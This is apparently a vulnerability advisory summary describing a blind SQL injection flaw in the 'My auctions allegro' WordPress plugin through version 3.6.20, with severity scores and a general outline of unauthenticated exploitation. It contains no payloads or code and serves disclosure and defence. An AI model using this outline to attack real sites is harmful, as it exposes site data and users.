Improper neutralization of special elements in an SQL command in the My auctions allegro plugin allows an attacker to perform blind SQL injection. This flaw can be leveraged to read, modify, or delete data stored in the site’s database, potentially exposing sensitive user information or giving the attacker control over critical application data. The weakness is a classic SQL Injection (CWE-89).

WordPress sites running the wphocus My auctions allegro plugin version 3.6.20 or older are vulnerable. The issue spans versions from the earliest available to 3.6.20, with no later releases mentioned in the advisory.

The CVSS score of 8.5 indicates high severity, and the EPSS score of less than 1% suggests that the probability of exploitation in the near term is low, although the vulnerability remains significant. The flaw is not listed in the CISA KEV catalog. An attacker would need to supply crafted input to the plugin’s public interface, likely through a form or URL parameter, to trigger the injection. Because the injection is blind, the attacker may not immediately observe results but can infer successful exploitation through timing or error messages. The vulnerability does not require privileged access and can be executed remotely by unauthenticated users.